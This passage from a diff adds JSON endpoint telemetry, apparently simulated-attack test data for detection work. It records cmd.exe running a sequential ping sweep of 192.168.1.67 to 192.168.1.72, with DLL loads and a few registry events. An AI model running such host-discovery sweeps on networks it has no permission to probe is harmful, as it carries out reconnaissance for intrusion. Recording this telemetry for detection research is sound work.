"PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572301980000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572301980000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572301980000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572301980000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572301980000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572301980000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572301980000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "event_type": "process", + "pid": 7784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572306840000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.67", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4164, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572307020000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572306990000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572306990000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572306990000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572306990000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572306990000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572306990000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572306990000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572306990000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572306990000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572306990000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572306990000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "event_type": "process", + "pid": 4164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572311840000, + "unique_pid": "{42FC7E13-CB6E-5C05-0000-0010461B5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.68", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5260, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572312010000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572311990000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572311990000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572311990000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572311990000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572311990000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572311990000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572311990000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572311990000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572311990000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572311990000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572312140000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883572314170000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883572314170000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883572314170000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883572315420000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 5824, + "process_name": "SearchIndexer.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", + "registry_value": "NewClientID", + "timestamp": 131883572315580000, + "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", + "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", + "timestamp": 131883572315580000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000002E021A", + "registry_value": "W32:00000000002E021A", + "timestamp": 131883572316050000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000002E021A", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000002E021A\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883572316050000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "process", + "pid": 5260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572316840000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010511E5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.69", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7640, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572316990000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572316980000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572316980000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572316980000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572316980000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572316980000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572316980000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572316980000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572316980000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572316980000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572316980000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572316980000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "event_type": "process", + "pid": 7640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572317450016, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-00102B275201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.70", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1572, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572317560000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572317450016, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572317450016, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572317450016, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572317450016, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572317450016, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572317450016, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572317450016, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572317450016, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572317610000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572317610000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572317610000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "event_type": "process", + "pid": 1572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572321840000, + "unique_pid": "{42FC7E13-CB6F-5C05-0000-0010322A5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.71", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5420, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572321980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "event_type": "process", + "pid": 5420, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572326830000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010AF2C5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.72", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4564, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572327000000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572326980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572326980000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" 